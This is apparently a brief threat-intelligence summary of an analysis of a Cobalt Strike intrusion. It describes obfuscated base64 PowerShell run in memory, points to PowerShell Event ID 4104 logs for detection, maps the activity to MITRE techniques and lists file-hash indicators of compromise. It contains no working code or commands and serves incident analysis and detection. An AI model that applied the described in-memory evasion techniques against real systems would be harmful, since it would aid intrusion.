Cobalt Strike has been leveraged in an attack to execute obfuscated PowerShell scripts, running in memory to evade detection. The analysis revealed the importance of Windows Event Logs for identifying malicious activity. Despite the complexity of decoding the payloads, key indicators of compromise were identified. Affected: Windows systems, PowerShell, Cobalt Strike users
Keypoints :
- Cobalt Strike is a versatile tool used in cyber attacks, utilizing multiple techniques for execution.
- The exploitation involved PowerShell scripts that were obfuscated using base64 encoding.
- Key logs for investigation include the Windows PowerShell Event Log filtered by Event ID: 4104.
- Dynamic analysis revealed the use of .NET in the payload execution process.
- Indicators of Compromise (IOCs) were extracted from the analysis of both static and dynamic aspects of the malware.
MITRE Techniques :
- Execution (T1059): PowerShell scripts executed with PowerShell commands.
- Obfuscated Files or Information (T1027): Use of base64 encoding to conceal script content.
- Command and Control (C2) (T1071): External C2 calls made using the payload that was executed in memory.
- Process Injection (T1055): Execution of the payload through memory to avoid detection.
Indicator of Compromise :
- [MD5] B98133496D9FC6B053EEDB6C90D54888
- [SHA1] AAE6281D29E42EC9530E96EC30D58F7A3CEB4091
- [SHA256] 7DECB4EE4B4A6DEDBEA1E184FBA5BDC53704D6983016EE13B3F84A83CF2A1F88
- [MD5] 15E27CA4AE6E91402C25FC3AD1B9384D
- [SHA1] 19D5910C9021CC332807882CA0CFFCFC609B39AF
Full Story: https://medium.com/@psyrensics/cobalt-strike-45ae9ab79697?source=rss——malware-5